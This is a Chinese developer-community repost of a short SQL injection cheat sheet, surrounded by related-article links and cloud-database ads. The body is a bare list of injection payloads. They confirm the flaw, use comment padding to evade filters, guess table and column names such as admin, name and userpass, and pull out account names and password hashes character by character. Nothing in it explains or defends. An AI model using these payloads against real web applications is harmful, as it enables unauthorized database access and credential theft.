AI 助理
文档备案控制台
开发者社区 数据库 文章 正文

SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码

2017-10-01 1492
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

检查漏洞

1' or 1=1  or ('1' = '1
1' or 1=1)  or '1' = '1
1' or 1=1 or '1' = '1
1'/**/or/**/1=1/**/or/**/'1'= '1

猜表名
1' or 0<(select count(*) from admin) and '1' = '1
1'/**/or/**/0<(select/**/count(*)/**/from/**/user)/**/and/**/'1'='1
1'/**/or/**/0<(select/**/count(*)/**/from/**/guanliyuan)/**/and/**/'1'='1


猜列名
1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1

猜帐号
1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1)  and '1' = '1
1' or 1<(select top 1 count(*) from admin where name = 'XXX' )  and '1' = '1

猜帐号
1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635   and '1' = '1
1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a')  and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1




本文转自黄聪博客园博客,原文链接:http://www.cnblogs.com/huangcong/archive/2011/07/16/2108073.html,如需转载请自行联系原作者

文章标签:
SQL
数据库
安全
关键词:
SQL数据库
数据库sql
SQL漏洞
代码数据库
代码SQL
老朱教授
目录
相关文章
游客vphb4ae2je2zi
|
4月前
|
关系型数据库 MySQL 数据库
阿里云数据库RDS费用价格:MySQL、SQL Server、PostgreSQL和MariaDB引擎收费标准
阿里云RDS数据库支持MySQL、SQL Server、PostgreSQL、MariaDB,多种引擎优惠上线!MySQL倚天版88元/年,SQL Server 2核4G仅299元/年,PostgreSQL 227元/年起。高可用、可弹性伸缩,安全稳定。详情见官网活动页。
游客vphb4ae2je2zi
921 152
sysin
|
4月前
|
SQL 人工智能 Linux
SQL Server 2025 RC1 发布 - 从本地到云端的 AI 就绪企业数据库
SQL Server 2025 RC1 发布 - 从本地到云端的 AI 就绪企业数据库
sysin
485 5
SQL Server 2025 RC1 发布 - 从本地到云端的 AI 就绪企业数据库
蓝易云
|
3月前
|
SQL 存储 监控
SQL日志优化策略:提升数据库日志记录效率
通过以上方法结合起来运行调整方案, 可以显著地提升SQL环境下面向各种搜索引擎服务平台所需要满足标准条件下之数据库登记作业流程综合表现; 同时还能确保系统稳健运行并满越用户体验预期目标.
蓝易云
251 6
上云就上阿狸云
|
4月前
|
关系型数据库 分布式数据库 数据库
阿里云数据库收费价格:MySQL、PostgreSQL、SQL Server和MariaDB引擎费用整理
阿里云数据库提供多种类型,包括关系型与NoSQL,主流如PolarDB、RDS MySQL/PostgreSQL、Redis等。价格低至21元/月起,支持按需付费与优惠套餐,适用于各类应用场景。
上云就上阿狸云
1045 4
龙轩8023
|
SQL 安全 数据库
三步堵死SQL注入漏洞
  SQL注入是什么?   许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入。
龙轩8023
1226 0
游客j4mujezz7vm7y
|
关系型数据库 MySQL 网络安全
5-10Can't connect to MySQL server on 'sh-cynosl-grp-fcs50xoa.sql.tencentcdb.com' (110)")
5-10Can't connect to MySQL server on 'sh-cynosl-grp-fcs50xoa.sql.tencentcdb.com' (110)")
游客j4mujezz7vm7y
283 1
sunrr
|
SQL 存储 监控
SQL Server的并行实施如何优化?
【7月更文挑战第23天】SQL Server的并行实施如何优化?
sunrr
593 13
小王老师呀
|
SQL
解锁 SQL Server 2022的时间序列数据功能
【7月更文挑战第14天】要解锁SQL Server 2022的时间序列数据功能,可使用`generate_series`函数生成整数序列,例如:`SELECT value FROM generate_series(1, 10)。此外,`date_bucket`函数能按指定间隔(如周)对日期时间值分组,这些工具结合窗口函数和其他时间日期函数,能高效处理和分析时间序列数据。更多信息请参考官方文档和技术资料。
小王老师呀
408 9
以山向海
|
SQL 存储 网络安全
关系数据库SQLserver 安装 SQL Server
【7月更文挑战第26天】
以山向海
286 6
源码星辰
|
SQL Oracle 关系型数据库
MySQL、SQL Server和Oracle数据库安装部署教程
数据库的安装部署教程因不同的数据库管理系统(DBMS)而异,以下将以MySQL、SQL Server和Oracle为例,分别概述其安装部署的基本步骤。请注意,由于软件版本和操作系统的不同,具体步骤可能会有所变化。
源码星辰
1250 3

热门文章

最新文章

  • 1
    大量慢sql导致mysql服务器的cpu飙升到100%
  • 2
    SQL Server 发布 2016 企业单机版
  • 3
    SQL Server里PIVOT运算符的”红颜祸水“
  • 4
    实战分区表:SQL Server 2k5&2k8系列(三)
  • 5
    T-sql语句查询执行顺序
  • 6
    SQL Server Replication 中关于视图的点滴
  • 7
    sql server 2008学习9 编写脚本和批处理
  • 8
    SQL优化实例
  • 9
    常用的数据统计Sql 总结(转)
  • 10
    v$sql_bind_capture与timestamp类型的绑定变量的数值
  • 1
    除了JDBC,还有哪些常见的数据库访问技术?
    369
  • 2
    Python SQLAlchemy模块:从入门到实战的数据库操作指南
    495
  • 3
    云栖大会|AI时代关系型数据库创新突破:软硬协同赋能企业数智化转型
    1014
  • 4
    云栖大会|AI时代的数据库变革升级与实践:Data+AI驱动企业智能新范式
    868
  • 5
    云栖大会|AI浪潮下的NoSQL演进:下一代数据库的破局之道
    455
  • 6
    【赵渝强老师】使用NetManager创建Oracle数据库的监听器
    259
  • 7
    探究ClickHouse数据库的Mutation机制
    224
  • 8
    阿里云RDS云数据库全解析:产品功能、收费标准与活动参考
    783
  • 9
    云栖重磅|瑶池数据库:从云原生数据底座向“AI就绪”的多模态数据底座演进
    654
  • 10
    AI大模型应用实践 八:如何通过RAG数据库实现大模型的私有化定制与优化
    879

    • 相关课程

    更多
  • 数据库的前世今生
  • 数据库核心概念
  • 从传统数据库到云数据库演进
  • 数据库常见问题排查
  • 数据库及SQL/MySQL基础
  • 高校精品课-西安交通大学 -数据库理论与技术

    • 相关电子书

    更多
  • 开源数据库工作室推广计划
  • 国产数据库研制人才培养实践
  • 阿里云&信通院《Serverless数据库技术研究报告》
    • 下一篇
    附部署代码|云数据库RDS 全托管 Supabase服务:小白轻松搞定开发AI应用